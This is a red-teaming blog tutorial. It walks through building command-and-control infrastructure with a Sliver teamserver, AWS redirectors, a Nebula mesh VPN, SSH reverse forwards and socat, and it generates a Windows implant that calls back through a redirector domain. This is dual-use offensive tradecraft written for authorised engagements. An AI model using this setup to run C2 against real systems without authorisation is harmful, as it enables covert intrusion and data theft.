@April 30, 2022 6:12 PM (EDT)
Or at least done safely.
(5/18/22 Edit:) Hey there! I ended up doing a stream with Taggart on this subject. It was a good time. Check it out here:
#AttackOnTuesday: Red Team Cloud Architecture w/HuskyHacks! (https://restre.am/yt)
In which Husky drops by to show us how to do things properly on a red team engagement!
Let’s take a look at how to build out safe and resilient red team infrastructure from the ground up, step by step.
You may be familiar with Tim MalcomVetter’s blog post on Safe Red Team Infrastructure, where he lays out a high-level overview of how to build a safe red team operational network. That post changed my life, but it lacked the technical details on how to carry out the process in practice.
Safe Red Team Infrastructure
This is a quick follow-up to "Responsible Red Teams." This walks at a high level through creating a safe red team infrastructure that is hosted in your company's protected data center (firewalls, IPS, logging, packet capture, environmentals, door locks, man traps, cameras, locks, armed guards, concrete planters, tank/car bomb traps, violent yard gnomes, what-have-you).
So I wanted to write this as an answer to that blog post and combine some other wisdom I’ve picked up over the years. People like RastaMouse and byt3bl33d3r have shaped my understanding of this task.
byt3bl33d3r’s take on this task turns it into a containerized, CI/CD-driven, high-availability dream that scales out indefinitely. Rasta uses Terraform and Ansible to command cloud assets at the press of a button. They both end up with extremely impressive solutions and my HuskyHat goes off to them for it.
But for me, well, my brain is a bit more on the smooth side. My brain is so smooth you could skip it across a pond at sunrise while you meditate on your life’s choices.
So I’ll be taking the long road. My implementation has a larger footprint and takes a bit longer to set up. But it does step through each part of the setup and point out security considerations along the way.
This post should be interpreted as an instructional session for building your infrastructure. It is not all-encompassing and can probably be improved in several ways. But here, as with all things:
Understand first; automate second.
I am a fan of automation/containerization for this task, but only after understanding the major security considerations at play.
By the end of this note, if you follow the steps, you will have a small POC-sized network of red team infrastructure that can support operations. This small network will be able to scale infinitely on a mesh overlay VPN called Nebula.
Most importantly, this infrastructure will be safe and responsible from a red teaming perspective. It will minimize the risk to your client’s data as it is siphoned from their environment in a calculated fashion.
In future posts, I will write about how to make it swat down prying eyes that try to examine your infrastructure, with a little help from Nginx.
Let’s get it.
🏗️ Design Philosophy
This is from Tim MalcomVetter’s original blog post. We will use this as a reference point, but we will make several iterations and improvements on this as we go.
The following sections are collapsed into toggles for organizational purposes, but they should be followed in order.
🔴 Teamserver Setup
It all starts with your teamserver.
You will build all of this infrastructure from your teamserver, outward.
This is the server that handles all agent callbacks and serves as the locus of control for the whole operation. Your client’s data ends up here while you are nabbing it off of the endpoint.
So what does that mean? It needs to be secure.
Do not host this in the ☁️ C L O U D ☁️.
I might have lost a few of you with that last sentence, but I stand by it. There’s a long and involved argument for why this must be the case, but I’ll summarize it with this question:
Should your client’s “stolen” data reside in a cloud resource where you have no SLA, no non-disclosure understanding, and no control over how the resources are safeguarded?
Your C2 server should be on-premise. I don’t own a datacenter with locks, guards, cameras, and all of those sweet sweet mitigative controls, so my PC in my apartment will have to suffice for this demo. The point is that my teamserver is in a location where I have physical access to the equipment and can control who else has physical access to it.
Please note: I don’t recommend running real engagements from your PC in your apartment.
FOR INSTRUCTIONAL PURPOSES ONLY
For your teamserver’s OS type, this may depend on the operation. But Kali is always a good choice. I’ve also done engagements where a simple Ubuntu Desktop host was used and it worked just fine.
⚔️ Install Your C2
Install your C2 of choice! I’m going to use Sliver for this demo because I’ve grown to like it a lot and it’s analogous to an open source Cobalt Strike of sorts.
GitHub - BishopFox/sliver: Adversary Emulation Framework
Adversary Emulation Framework. Contribute to BishopFox/sliver development by creating an account on GitHub.
Sliver has possibly the easiest install of any C2 I’ve ever seen:
┌──(kali㉿kali)-[~/Desktop]
└─$ curl https://sliver.sh/install | sudo bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sliver
Connecting to localhost:31337 ...
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain infect
[*] Server v1.5.12 - aacf2c16ac00e4609231f5faee588bdb9ea9c532
[*] Welcome to the sliver shell, please type 'help' for options

sliver >
Great! Let’s put Sliver to the side for a moment.
🔑 Create some SSH Keys
Any authentication/cryptographic material should be stored on-prem. This includes the id_rsa of the key pair that we’re about to make, as well as the certs for Nebula (more on this later!).
Make a directory on your teamserver and make an SSH key pair:
┌──(kali㉿kali)-[~/Desktop/certs]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Desktop/certs/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/Desktop/certs/id_rsa
Your public key has been saved in /home/kali/Desktop/certs/id_rsa.pub
The key fingerprint is:
SHA256:+rsnGzLB1ZPMgDwadRjkDak2UkaFjMf9Heu+tY0gSVw kali@kali
The key's randomart image is:
+---[RSA 3072]----+
[...randomart...]
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/certs]
└─$ ls
id_rsa  id_rsa.pub
So far so good.
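A quick aside: the demo uses the default RSA pair, but if your toolchain supports it, ed25519 keys are smaller and faster, and AWS accepts imported ed25519 public keys for Linux instances. A hedged sketch (the /tmp path and comment string are illustrative, not part of the demo):

```shell
# Generate an ed25519 pair in a scratch directory.
# -N "" sets an empty passphrase for the demo; use a real one for ops.
mkdir -p /tmp/rt-certs
ssh-keygen -t ed25519 -f /tmp/rt-certs/id_ed25519 -N "" -C "redteam-ops" -q
ls /tmp/rt-certs
```

Everything else in this walkthrough works the same way with either key type.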
Let’s grab another tool we’ll use today: Nebula. Nebula is an extremely simple way to build a mesh overlay VPN where any two points on the network can always communicate, provided they can reach an intermediary host. More on this later.
┌──(kali㉿kali)-[~/Desktop]
└─$ mkdir nebula && cd nebula
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz
--2022-04-30 10:37:50--  https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz
[let that run]
2022-04-30 10:37:50 (47.2 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495]
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ tar -xvf nebula.tar.gz
nebula
nebula-cert
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ ls
nebula  nebula-cert  nebula.tar.gz
☁️ Provision Cloud Assets
Here we go, Cloud Cowpeeps, time to stand up our cloud infrastructure. But before we do that, we need to be very, very clear.
👏 DO 👏 NOT 👏 STORE 👏 SENSITIVE 👏 MATERIAL 👏 ON 👏 YOUR 👏 CLOUD 👏 ASSETS 👏
👏 EVER 👏
The assets we’re going to provision should be treated as a contested zone. Private keys, stolen files, sensitive material of any kind must never be stored here.
The one exception to this is your Nebula host keys, which have to be on the hosts by necessity if you want them to connect to your VPN. This is a risk we’re willing to take.
I will very clearly spell out which parts of the Nebula equation should go on the cloud hosts and which ones should not. More on that in a bit.
For the demo, we’ll use this new and upcoming cloud provider called AWS. Have you heard of these guys?
We’ll start with our Listeningpost, which is our primary redirector.
Head on over to AWS. Make yourself an account if you don’t have one already.
Cloud Computing Services - Amazon Web Services (AWS)
Once you’re logged in and have set up MFA, head over to the EC2 section:
Scroll down in the menu and go to the Key Pairs section, then click Import key pair from the drop-down in the upper-right corner:
Grab the contents of your id_rsa.pub file and copy them into the block on this page:
┌──(kali㉿kali)-[~/Desktop/certs]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzy/90GFz+LCd5rrbx+RW2kdGtEDNhfbp9Me28eZ1+zM1fYbg1MdV/gRQkZTnETZnxIp5tCWUjJ8h07VLTunbLdIst9NueDDuTLYSVC+yu+vlKvFWRxYkneydqw8kkRuue1aJFYDPnOBKxOZC5ZOgE3C3y2Psba+CsjbdgnShPJiEl1Buq+knlti3ihJ9UplCVfHnqgy/4CzChopEVurOd0c2v8NiTGWIhDvbkNQmHYtcMymKZ2G66R9Ng1kHU9xNiAUxXwt7JINg6KLh9qkdHyt9u2Ua+Xbxq6pbE2Ar4Rb0Gr7mEYfVGzojN0iaYS9c1YCTvtm/PwxI0yCHOSaV/vS20y+oTg/v+hJ2Dn78m+CdRNQ1JO3pW+LaUNdlNd6XzngddW+Y6IaG9nqD8c5vruYq5WqZB4oxZQqEOuC6VWlpNgR06BZH39z1LskA+WdMJ8irJ1bvpWwT41QdpskY6JXfUCsKOhivtQHv7rmFOqAHHdc7Q7ayePS1iFeM9Qyc= kali@kali
Remember kids, the “.pub” in id_rsa.pub means that you can post that key on the wall of your local pub and it would be completely fine!
Once imported, this key can be used with your cloud host:
We will now go to EC2 > Instances > Launch an Instance.
Name your host:
For application and OS Images, we’ll select Quick Start and Ubuntu for the OS:
Select a free-tier eligible instance type so we can save our monies. Also, add the key pair that we just added to the instance:
Now, this is important. In the Network Settings, we want to lock this down so SSH is only allowed from our own IP address. Go to ipchicken.com, get your internet-facing IP address, and put it here, followed by a /32 to lock it down to that IP address only:
Once this is complete, launch the instance!
Go back to Instances and your new instance is now spinning up. Click on it and examine its settings.
We can now try SSHing into this instance from our Kali host:
While we’re here, let’s install a few tools we’re going to need shortly:
ubuntu@ip-172-31-28-251:~$ sudo apt-get update -y && sudo apt-get install socat
[let that run]
ubuntu@ip-172-31-28-251:~$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz
[let that run]
2022-04-30 14:35:28 (96.0 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495]
ubuntu@ip-172-31-28-251:~$ tar -xvf nebula.tar.gz
nebula
nebula-cert
ubuntu@ip-172-31-28-251:~$ ls
nebula  nebula-cert  nebula.tar.gz
Lighthouse acts as our Nebula focal point. Nebula is not a traditional hub-and-spoke VPN. Instead, it’s a mesh overlay VPN where any two points can communicate directly as long as they can both find the intermediary server called the Lighthouse. It’s important to note that traffic does not necessarily flow through Lighthouse to get from point A to point B. Instead, Point A identifies where Point B is by querying Lighthouse and then works out the fastest way to transfer data.
Ars Technica has a great article about how this works at a high level:
How to set up your own Nebula mesh VPN, step by step
Last week, we covered the launch of Slack Engineering's open source mesh VPN system, Nebula. Today, we're going to dive a little deeper into how you can set up your own Nebula private mesh network-along with a little more detail about why you might (or might not) want to.
The cool thing about this is that once this is set up, we can scale outwards infinitely and even host each part of our infrastructure on different cloud providers.
We’re going to launch another instance with exactly the same configuration as Listeningpost and name it lighthouse. Follow the rest of the instructions for setting up Listeningpost to spin up Lighthouse. I’ll leave it up to you if you want to make a new key pair for Lighthouse. For simplicity’s sake, I’m using the same key pair as before.
Again, it bears repeating: lock down SSH to only allow your IP address inbound.
If all has gone well, we now have two cloud hosts:
Let’s SSH into Lighthouse:
Let’s also grab Nebula for this host:
ubuntu@ip-172-31-26-117:~$ wget https://github.com/slackhq/nebula/releases/download/v1.5.2/nebula-linux-amd64.tar.gz -O nebula.tar.gz
[let that run]
2022-04-30 14:59:37 (105 MB/s) - ‘nebula.tar.gz’ saved [11708495/11708495]
ubuntu@ip-172-31-26-117:~$ tar -xvf nebula.tar.gz
nebula
nebula-cert
🔥 Firewall Configuration
We now need to configure our cloud assets’ firewalls. This is a balancing act: we want them permissive enough that Lighthouse traffic and our C2 traffic can get where they need to go, but locked down enough that we’re not overexposed.
Head over to the Network Security section of the AWS dashboard and go to the Security Groups section:
Select “Create Security Group”:
We make a new security group rule for Lighthouse that allows inbound UDP port 4242. This allows hosts in our Nebula network to query the Lighthouse for adjacent hosts in the mesh. We can afford to open this up to all IPv4 addresses because this transaction is cryptographically verified against a certificate that we will create shortly:
You can leave the Outbound rules alone. Click Create Security Group.
Back in Instances, click the checkbox next to lighthouse, then click Actions > Security > Change Security Groups. In the Associated security groups drop-down, select your new rule for lighthouse and click Add security group.
We will open up more ports in a bit, but this is good for now.
🌌 Set Up Nebula
🪐 Space, the final C2 frontier 🌠
It’s time to set up our Nebula network.
We’ll set up all of our required certs and configs on the on-prem teamserver and keep them there for security’s sake. Then, slowly and methodically, we’ll roll each part out to the cloud assets.
🔒Create Nebula cert files
Over on your teamserver, run the following commands:
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ ls
nebula  nebula-cert  nebula.tar.gz
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ mkdir certs && mv nebula-cert certs/
┌──(kali㉿kali)-[~/Desktop/nebula]
└─$ cd certs
┌──(kali㉿kali)-[~/Desktop/nebula/certs]
└─$ ./nebula-cert ca -name "ShellCorp, LLC"
┌──(kali㉿kali)-[~/Desktop/nebula/certs]
└─$ ./nebula-cert sign -name "lighthouse" -ip "192.168.100.1/24"
┌──(kali㉿kali)-[~/Desktop/nebula/certs]
└─$ ./nebula-cert sign -name "listeningpost" -ip "192.168.100.2/24" -groups "listening_posts"
┌──(kali㉿kali)-[~/Desktop/nebula/certs]
└─$ ./nebula-cert sign -name "teamserver" -ip "192.168.100.3/24" -groups "teamservers"
┌──(kali㉿kali)-[~/Desktop/nebula/certs]
└─$ ls
ca.crt  ca.key  lighthouse.crt  lighthouse.key  listeningpost.crt  listeningpost.key  nebula-cert  teamserver.crt  teamserver.key
Borrowing from Marcello’s post here:
The ca.key file is the most sensitive file in this entire setup, keep it in a safe place.
📜 Create Nebula Config Files
Hosts in a Nebula network require a config file. The config files are written in YAML and are super easy to read and understand. Again, borrowing from Marcello’s post here with alterations:
# lighthouse-conf.yml
pki:
  ca: /home/ubuntu/ca.crt
  cert: /home/ubuntu/lighthouse.crt
  key: /home/ubuntu/lighthouse.key

static_host_map:
  "192.168.100.1": ["<LIGHTHOUSE IP>:4242"]

lighthouse:
  am_lighthouse: true

listen:
  host: 0.0.0.0
  port: 4242

punchy:
  punch: true

tun:
  disabled: false
  dev: nebula1
  drop_local_broadcast: false
  drop_multicast: false
  tx_queue: 500
  mtu: 1300
  routes:
  unsafe_routes:

logging:
  level: info
  format: text

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m
    max_connections: 100000

  outbound:
    - port: any
      proto: any
      host: any

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: 4789
      proto: any
      host: any
    - port: 22
      proto: any
      cidr: 192.168.100.0/24
# listeningpost-conf.yml
pki:
  ca: /home/ubuntu/ca.crt
  cert: /home/ubuntu/listeningpost.crt
  key: /home/ubuntu/listeningpost.key

static_host_map:
  "192.168.100.1": ["<LIGHTHOUSE IP>:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

punchy:
  punch: true

tun:
  disabled: false
  dev: nebula1
  drop_local_broadcast: false
  drop_multicast: false
  tx_queue: 500
  mtu: 1300
  routes:
  unsafe_routes:

logging:
  level: info
  format: text

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m
    max_connections: 100000

  outbound:
    - port: any
      proto: any
      host: any

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: 80
      proto: any
      host: any
    - port: 443
      proto: any
      host: any
    - port: 4789
      proto: any
      host: any
    - port: 22
      proto: any
      cidr: 192.168.100.0/24
# teamserver conf
pki:
  ca: /home/kali/Desktop/nebula/certs/ca.crt
  cert: /home/kali/Desktop/nebula/certs/teamserver.crt
  key: /home/kali/Desktop/nebula/certs/teamserver.key

static_host_map:
  "192.168.100.1": ["<LIGHTHOUSE IP>:4242"]

lighthouse:
  am_lighthouse: false
  interval: 60
  hosts:
    - "192.168.100.1"

listen:
  host: 0.0.0.0
  port: 4242

punchy:
  punch: true

tun:
  disabled: false
  dev: nebula1
  drop_local_broadcast: false
  drop_multicast: false
  tx_queue: 500
  mtu: 1300
  routes:
  unsafe_routes:

logging:
  level: info
  format: text

firewall:
  conntrack:
    tcp_timeout: 12m
    udp_timeout: 3m
    default_timeout: 10m
    max_connections: 100000

  outbound:
    - port: any
      proto: any
      host: any

  inbound:
    - port: any
      proto: icmp
      host: any
    - port: 80
      proto: any
      host: any
    - port: 443
      proto: any
      host: any
    - port: 4789
      proto: any
      host: any
    - port: 22
      proto: any
      cidr: 192.168.100.0/24
Take a quick look through these conf files and alter anything you need, like the location of the .crt and .key files. Make sure to swap out <LIGHTHOUSE IP> for Lighthouse’s public IP address. This value should not change while the Nebula network is in operation, so try to keep your Lighthouse at the same IP during ops.
For ease of troubleshooting, ports 80 and 443 are set to allow any ingress traffic to the Listeningpost host. This is not particularly secure by itself, but we’ll leave these open in the Nebula config and let the AWS Security Groups do the heavy lifting of blocking traffic we don’t want. We’ll use the security group settings to lock this down to specific IP addresses in a moment.
We can also ratchet up the security here in the firewall rules and specify hosts and protocols. Maybe you want SSH to be open to everything inside of the Nebula network, but maybe there are some hosts that you don’t want communicating. This file is where you can lock these down.
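For example, here is a hedged sketch of a tighter inbound block for the Listeningpost, using the groups we baked into the certs earlier (exact rules will vary per op, and this replaces the open port-22 rule above):

```yaml
# Hypothetical: only hosts whose Nebula cert carries the "teamservers"
# group may reach SSH on this host; ICMP stays open inside the mesh.
inbound:
  - port: any
    proto: icmp
    host: any
  - port: 22
    proto: tcp
    groups:
      - teamservers
```

Because group membership is part of the signed certificate, a compromised cloud host can’t simply claim its way into a group.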
➡️ Copy Over
Copy the following files to each host via SCP or other means:
- Its specified config YAML file
- Its specified .crt file (e.g., lighthouse.crt)
- Its specified .key file (e.g., lighthouse.key)
- The ca.crt file
Keep ca.key safe on your Teamserver. Do not copy it to the cloud hosts.
┌──(kali㉿kali)-[~/Desktop]
└─$ scp -i certs/id_rsa [file] ubuntu@[ip]:~/[destination]
[repeat for the listed files above for each host]
...
ubuntu@ip-172-31-26-117:~$ ls
ca.crt  lighthouse-conf.yml  lighthouse.crt  lighthouse.key  nebula  nebula-cert  nebula.tar.gz
🪐 Fire It Up!
Start up Lighthouse first:
ubuntu@ip-172-31-26-117:~$ sudo ./nebula -config lighthouse-conf.yml
INFO Firewall rule added firewallRule="map[caName: caSha: direction:outgoing endPort:0 groups: host:any ip: proto:0 startPort:0]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:0 groups: host:any ip: proto:1 startPort:0]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:4789 groups: host:any ip: proto:0 startPort:4789]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:22 groups: host: ip:192.168.100.0/24 proto:0 startPort:22]"
INFO Firewall started firewallHash=3190d01bf8eb84ecff6cfec0ba8c3ef02c117ad1900036ae1c70ceb45cdcfe56
INFO Main HostMap created network=192.168.100.1/24 preferredRanges=""
INFO UDP hole punching enabled
INFO Nebula interface is active build=1.5.2 interface=nebula1 network=192.168.100.1/24 udpAddr="0.0.0.0:4242"
Next, fire up the other hosts:
ubuntu@ip-172-31-28-251:~$ sudo ./nebula -config listeningpost-conf.yml
INFO Firewall rule added firewallRule="map[caName: caSha: direction:outgoing endPort:0 groups: host:any ip: proto:0 startPort:0]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:0 groups: host:any ip: proto:1 startPort:0]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:80 groups: host:any ip: proto:0 startPort:80]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:443 groups: host:any ip: proto:0 startPort:443]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:4789 groups: host:any ip: proto:0 startPort:4789]"
INFO Firewall rule added firewallRule="map[caName: caSha: direction:incoming endPort:22 groups: host: ip:192.168.100.0/24 proto:0 startPort:22]"
INFO Firewall started firewallHash=424ddc66ba27c265fd5d30b4c9ed87c9bc5280a0a55a77a9c6f5b9bd9f057bcb
INFO Main HostMap created network=192.168.100.2/24 preferredRanges=""
INFO UDP hole punching enabled
INFO Nebula interface is active build=1.5.2 interface=nebula1 network=192.168.100.2/24 udpAddr="0.0.0.0:4242"
INFO Handshake message sent handshake="map[stage:1 style:ix_psk0]" initiatorIndex=2134990999 udpAddrs="[220.127.116.11:4242]" vpnIp=192.168.100.1
INFO Handshake message received certName=lighthouse durationNs=2397928 fingerprint=98142c9a9c5cf70553f68948cadc14e0266ace7910fa1d8af22bcde8506eeb49 handshake="map[stage:2 style:ix_psk0]" initiatorIndex=2134990999 issuer=b221b8d0ae4a395d6f5222af65c874bef347298d4ccc9bdbc189fe526a8c6a6e remoteIndex=2134990999 responderIndex=1922843025 sentCachedPackets=1 udpAddr="18.104.22.168:4242" vpnIp=192.168.100.1
The “Handshake message received” line is what we’re looking for here. If you inspect your Teamserver’s interfaces, you should see the new nebula1 interface:
┌──(kali㉿kali)-[~/Desktop]
└─$ ip -br -c a
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0             UP             10.10.1.132/24 fe80::20c:29ff:fe00:2db6/64
docker0          DOWN           172.17.0.1/16
nebula1          UNKNOWN        192.168.100.3/24 fe80::830:a71e:a538:2c93/64
ayyy! And we can ping to verify connectivity:
┌──(kali㉿kali)-[~/Desktop]
└─$ ping -c 1 192.168.100.1
PING 192.168.100.1 (192.168.100.1) 56(84) bytes of data.
64 bytes from 192.168.100.1: icmp_seq=1 ttl=64 time=27.5 ms

--- 192.168.100.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 27.499/27.499/27.499/0.000 ms
⛓️ Set Up Reverse Port Forwarding & SOCAT
Our next objective is to ensure traffic can traverse from Listeningpost’s external IP address all the way back to our teamserver. We’ll prove this concept with port 80 and standard HTTP before we bump up the OPSEC and set up HTTPS.
To do this securely, we will create a reverse port forward from the teamserver to the Listeningpost, as described in Tim MalcomVetter’s original blog post.
On the teamserver, we do the following:
(Note: I’ve now added lighthouse and listeningpost to my /etc/hosts on the teamserver by their Nebula IP addresses for simplicity.)
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -N -R 8080:localhost:80 -i certs/id_rsa ubuntu@listeningpost
The authenticity of host 'listeningpost (192.168.100.2)' can't be established.
ED25519 key fingerprint is SHA256:gNM2mXEqesJwS0BUvdKwABrRygbdfGS6R5Ah/2um/ZY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'listeningpost' (ED25519) to the list of known hosts.
There is no other output in the terminal, but once we view ss -plant on Listeningpost...
Great! We now have a listening port on the localhost of Listeningpost.
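If you want to check from the shell without eyeballing the full socket table, ss can filter on the forwarded port directly (8080 matches the reverse forward above):

```shell
# Show only TCP listeners bound to port 8080 (the reverse-forward port).
ss -plnt '( sport = :8080 )'
```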
Now we need to bind a port on Listeningpost’s IP address and send it to our reverse port forward. We specify its private IPv4 address here, knowing that this is downstream of the external public-facing IP address on the same host.
We can do this with socat:
ubuntu@ip-172-31-28-251:~$ sudo socat tcp-listen:80,reuseaddr,fork,bind=172.31.28.251 tcp:127.0.0.1:8080
Again, there is no feedback in the terminal.
Now, we won’t be able to traverse from our Listeningpost’s external IP just yet. We need to add a rule in our cloud security group to allow specific ingress traffic.
For this demo, I will open ingress traffic on port 80 and lock it down specifically to my own public IP address to keep prying eyes away for now:
Now, add this security group rule to our Listeningpost instance:
Now over on our teamserver:
┌──(kali㉿kali)-[~/Desktop]
└─$ mkdir www
┌──(kali㉿kali)-[~/Desktop]
└─$ cd www
┌──(kali㉿kali)-[~/Desktop/www]
└─$ echo "It works\!" > index.html
┌──(kali㉿kali)-[~/Desktop/www]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
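Before testing through the redirector, it’s worth confirming the web server answers locally. A scratch version of the same check (port 8000 and the /tmp path are illustrative, and avoid needing sudo):

```shell
# Serve a throwaway page locally and fetch it back.
mkdir -p /tmp/www-demo && cd /tmp/www-demo
echo "It works!" > index.html
python3 -m http.server 8000 --bind 127.0.0.1 >/dev/null 2>&1 &
SRV=$!
sleep 1
curl -s http://127.0.0.1:8000/    # prints: It works!
kill $SRV
```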
If all has gone according to plan, browsing to Listeningpost’s public IP address routes me through that interface, hits the socat redirector that bounces inbound TCP/80 to our reverse port forward, and ends up on our Teamserver, which is now serving our test HTML page.
It’s worth noting here: always test your infrastructure in little increments. It’s a lot easier to figure out what went wrong if you go step by step like I just did. It’s a lot harder when you run off to the race track and spin up a ton of infra, your C2, firewalls, Nebula, etc etc and then can’t figure out why your payload isn’t working.
🔒 OPSEC, Ahoy! TLS and HTTPS
So far so good, but let’s keep this 💯 and use end-to-end encryption.
To do this, we need a TLS certificate. Now, you can always go the long route of purchasing one from Namecheap or another registrar, but that’s a lot for a demo like this. In real life, you’ll go through the painful process of procuring domain names and registering certs for them.
If you’ve never had the pleasure of setting up SSL certs before, consider yourself lucky. It’s...a bit involved. It’s a great task to make the new red teamers on your team do. Or at least that’s what everyone told me.
Create a self-signed cert:
┌──(kali㉿kali)-[~/Desktop/ssl]
└─$ openssl req -new -x509 -sha256 -newkey rsa:2048 -nodes \
    -keyout fancyladsnacks.key.pem -days 365 -out fancyladsnacks.cert.pem
Generating a RSA private key
...................................................................+++++
............+++++
writing new private key to 'fancyladsnacks.key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:Someplace
Locality Name (eg, city) []:Somename
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Fancyladsnacks
Organizational Unit Name (eg, section) []:IT
Common Name (e.g. server FQDN or YOUR name) []:fancyladsnacks.info
Email Address []:firstname.lastname@example.org
┌──(kali㉿kali)-[~/Desktop/ssl]
└─$ ls
fancyladsnacks.cert.pem  fancyladsnacks.key.pem
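If you want to skip the interactive prompts, -subj answers them inline, and openssl x509 lets you double-check what you just minted. A sketch (the /tmp file names are illustrative, not the demo’s paths):

```shell
# Non-interactive version of the cert above, plus a quick inspection
# of the subject and expiry to confirm it came out as intended.
openssl req -new -x509 -sha256 -newkey rsa:2048 -nodes \
  -subj "/C=US/O=Fancyladsnacks/CN=fancyladsnacks.info" -days 365 \
  -keyout /tmp/fls.key.pem -out /tmp/fls.cert.pem 2>/dev/null
openssl x509 -in /tmp/fls.cert.pem -noout -subject -enddate
```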
On the teamserver, set up the HTTPS listener and point it at your certs:
sliver > https --cert /path/to/fancyladsnacks.cert.pem --key /path/to/fancyladsnacks.key.pem
[*] Starting HTTPS freetshirts.info:443 listener ...
[*] Successfully started job #1
We now create an agent:
sliver > generate --http https://fancyladsnacks.info
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
...
[*] Build completed in 00:00:25
[*] Implant saved to /home/kali/Desktop/SORRY_FAILURE.exe
That agent name is a bit on the nose, but we’ll roll with it.
The implant is listed as an HTTP agent, but this option services both HTTP and HTTPS listeners.
Meanwhile, I go back and make another security group setting that allows HTTPS inbound to Listeningpost and lock it down to my own IP address:
For instructional purposes only, I add Listeningpost’s public IP to my test target’s hosts file. In real life, you’ll register a legitimate DNS record to point to Listeningpost.
We reconfigure the reverse port forward and the socat listener on Listeningpost:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ssh -N -R 8443:localhost:443 -i certs/id_rsa ubuntu@listeningpost

ubuntu@ip-172-31-28-251:~$ sudo socat tcp-listen:443,reuseaddr,fork,bind=172.31.28.251 tcp:127.0.0.1:8443
If all has gone according to plan, we can land this agent anywhere in the world and we’ll get an end-to-end encrypted callback session when it is executed, provided it can reach the IP at fancyladsnacks.info.
Hey, this wouldn’t be a bad time to include autossh so your reverse port forward happens automagically:
┌──(kali㉿kali)-[~/Desktop]
└─$ nano ~/.ssh/config

Host listeningpost
    HostName 192.168.100.2
    User ubuntu
    Port 22
    IdentityFile /home/kali/Desktop/ssh/id_rsa
    RemoteForward 8443 localhost:443
    ServerAliveInterval 30
    ServerAliveCountMax 3

┌──(kali㉿kali)-[~/Desktop]
└─$ autossh -M 0 -f -N listeningpost
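If you want the forward to survive reboots without remembering to rerun autossh, a hypothetical systemd unit could wrap it (the unit name, user, and binary path are all illustrative; -f is dropped because systemd wants the process in the foreground):

```ini
# /etc/systemd/system/rpf-listeningpost.service (hypothetical)
[Unit]
Description=autossh reverse port forward to listeningpost
After=network-online.target

[Service]
User=kali
ExecStart=/usr/bin/autossh -M 0 -N listeningpost
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
```

Enable it with `sudo systemctl enable --now rpf-listeningpost`.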
However you decide to get the Sliver agent to the target is on you and outside the scope of this post. I’d recommend hosting it on a completely separate payload server. But once it has been downloaded and executed...
🐰 Follow The White Rabbit
Let’s think through how our traffic is now getting from the target to our teamserver:
- 👾The Sliver agent is executed on the target. It has been configured to go find https://fancyladsnacks.info using HTTPS, so it calls out to this DNS record.
- 📡 In real life, DNS resolution would occur. In this experiment, the hosts file directs the agent to Listeningpost’s external IP address.
- ↔️ Listeningpost uses a socat redirector bound to its public IP address to redirect traffic to a reverse port forward on port 8443. No SSL decryption takes place here. No files are stored here. The Listeningpost’s main job is to pass traffic along and it does this with VIGOR.
- 🪐 Our Nebula VPN configuration creates a mesh overlay network where the Listeningpost knows the Teamserver, and vice versa, by communicating with the Lighthouse. Both Lighthouse and Listeningpost are cloud provisioned assets and can be torn down and reprovisioned with relative ease.
